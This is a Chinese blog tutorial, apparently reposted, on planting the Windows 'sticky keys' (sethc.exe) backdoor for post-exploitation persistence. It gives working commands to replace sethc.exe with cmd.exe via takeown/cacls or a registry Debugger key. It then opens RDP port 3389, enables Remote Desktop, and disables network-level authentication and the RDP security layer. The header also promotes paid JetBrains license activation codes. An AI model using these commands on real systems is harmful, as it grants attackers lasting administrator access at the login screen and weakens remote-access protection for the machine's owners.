shift键粘滞了怎么办_5shift后门清免疫

shift键粘滞了怎么办_5shift后门清免疫1.简介沾滞键的目的是为了帮助那些按键有困难的人设计的

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

目录

 

1. 简介

2. 后门原理

3. 后门制作

3.1 方法一 cmd覆盖sethc

3.2 方法二 利用注册表修改沾滞键快捷方式

4. shift后门利用


1. 简介

沾滞键的目的是为了帮助那些按键有困难的人设计的,在Windows系统下连续按5次shift键后,系统就会执行system32下的sethc.exe,也就是启用了沾滞键。了解该方法的目的在于在完成渗透后能留下后门让攻击者一直拥有主机的管理员权限。

2. 后门原理

在C盘C:\Windows\System32目录下存在sethc.exe文件,正常情况下会执行sethc.exe文件,但是当我们将cmd.exe文件把sethc.exe文件通过更改名称给覆盖掉,当我们连续按下5次shift后执行的就是“cmd.exe”文件了。

shift键粘滞了怎么办_5shift后门清免疫

3. 后门制作

3.1 方法一 cmd覆盖sethc

copy C:\WINDOWS\system32\cmd.exe​ C:\windows\system32\sethc.exe   //如果没指定生成的文件,会直接覆盖copy的第二个参数,相当于将第二个参数换成了第一个参数,但是文件外部名称没变

在cmd窗口,输入上面的命令可能出现拒绝访问。

shift键粘滞了怎么办_5shift后门清免疫

出现上述情况需要将目录下的所有目录和文件、子目录下的所有者更改为管理员组(administrators)命令,

takeown  /f  c:\windows\system32\*.*  /a  /r  /d  y  # 获取整个文件夹及其下面子目录文件的所属权

cacls c:\windows\system32\*.* /T /E /G administrators:F # 将所有c:\windows\system32\目录下的文件、子文件夹的NTFS权限修改为仅管理员组(administrators)完全控制(删除原有NTFS权限设置)

shift键粘滞了怎么办_5shift后门清免疫

注销后在登陆界面尝试调用cmd.exe命令行窗口

shift键粘滞了怎么办_5shift后门清免疫

3.2 方法二 利用注册表修改沾滞键快捷方式

使用如下命令

REG ADD “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” /v Debugger /t REG_SZ /d “C:\windows\system32\cmd.exe”

该操作为添加注册表,引号内的内容为要将注册表项添加到”HKLM\……serhc.exe”

/v 是值名为Debugger 

/t 是类型为REG_SZ

/d 是数据为”C:\……\cmd.exe”

大致意思是在执行sethc.exe的时候会被cmd.exe给替代了

shift键粘滞了怎么办_5shift后门清免疫

结果截图如下: 

shift键粘滞了怎么办_5shift后门清免疫

4. shift后门利用

1.配置防火墙允许远程连接3389端口

netsh advfirewall firewall add rule name=”Remote Desktop” protocol=TCP dir=in localport=3389 action=allow

shift键粘滞了怎么办_5shift后门清免疫

 

2.开启远程桌面

REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer” /v fDenyTSConnections /t REG_DWORD /D 0 /f

shift键粘滞了怎么办_5shift后门清免疫

 

3.用户身份验证选项

REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v UserAuthentication /t REG_DWORD /d 0 

* 在最后参数“0”表示在会开启远程登陆验证,可以远程连接到锁屏登陆界面

* 当值为“1”时,使用远程连接工具携带凭证进行验证,不会看到锁屏登陆界面 

shift键粘滞了怎么办_5shift后门清免疫

 

 4.安全层设置

REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v SecurityLayer /t REG_DWORD /d 0

* “0”是连接前使用 rdp 协议进行身份验证,rdp 即远程桌面连接

* “1”是指在连接前两端协商来进行身份验证,默认值也为“1”

* “2”是使用 tls 协议来进行

测试结果: 

shift键粘滞了怎么办_5shift后门清免疫

总结一波:

总的来说该功能利用更多是在后渗透阶段,对于需要登陆主机,或者在web后门获取的shell上不能满足时。

 

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/192359.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • [深度学习] FM & FFM 算法基本原理

    [深度学习] FM & FFM 算法基本原理在推荐系统和计算广告业务中,点击率CTR(click-throughrate)和转化率CVR(conversionrate)是衡量流量转化的两个关键指标。准确的估计CTR、CVR对于提高流量的价值,增加广告及电商收入有重要的指导作用。无论使用什么类型的模型,点击率这个命题可以被归纳到二元分类的问题,我们通过单个个体的特征,计算出对于某个内容,是否点击了,点击了就是1,没点击就是0。对于任何二元分类的问题,最后我们都可以归结到逻辑回归上面。早期的人工特征工程+LR(Logisti…

    2022年5月1日
    64
  • colspan 和rowspan的用法,表格边框颜色和字体颜色设定

    colspan 和rowspan的用法,表格边框颜色和字体颜色设定colspan 和rowspan的用法,表格边框颜色和字体颜色设定

    2022年4月23日
    52
  • 正则表达式

    正则表达式今天看到了正则表达式,就再来重新巩固一遍啦~~~因为一些东西我都知道啦,所以就写了一个代码,将所发生的情况都试一试,还是直接上手知识来的更快呀一些功能必要说明都在注释里测试代码1import

    2022年7月3日
    17
  • java free hd 798,[https://www.798ziyuan.com/]Java入门级项目全程实录V2.0

    java free hd 798,[https://www.798ziyuan.com/]Java入门级项目全程实录V2.0Java入门级项目全程实录V2.0798资源网免责声明:[Java入门级项目全程实录V2.0]由分享人op**开源于2018-09-1119:35上传到百度网盘。此页面由蜘蛛程序自动抓取,以非人工方式自动生成,只作交流和学习使用。本网站本身不储存任何资源文件,其资源文件的安全性和完整性需要您自行判断,感谢您对本站的支持。Java入门级项目全程实录V2.0|____《Java入门级项…

    2022年7月7日
    15
  • mathtype大括号三个公式_latex大括号左对齐

    mathtype大括号三个公式_latex大括号左对齐数学方程输入对于很多理工科朋友来说是一件让人头疼的事情。不仅是数学方程本身就纷繁复杂花样百出,各种输入语法更是劝退无数人。然而很多看似复杂的东西其实并非如想象中的难,抓住本质即可快速入门。今天和大家分享下如何快速入门LaTeX,在XMind2020中轻松输入方程。01LaTeX是什么LaTeX是一种基于ΤΕΧ的排版系统,具有方便而强大的数学公式排版能力。日常中大家常见的高印刷质量的…

    2022年10月10日
    0
  • 2020年支持java8的Java反编译工具汇总

    2020年支持java8的Java反编译工具汇总luyten是一款操作简单、功能实用的java反编译工具,软件支持*.JAR、*.zip、*.class等类型文件的反编译操作,还原度非常高,支持更多功能设置,如显式导入、类型、合成组件等等,用户可根据不同的需求选择合适的显示项目,结果更明了。luyten是个人用过的最好用的java反编译工具。哪怕使用jd-gui反编译时会出现“//INTERNALERROR//”错误,无法反编译,此工具…

    2022年4月20日
    95

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号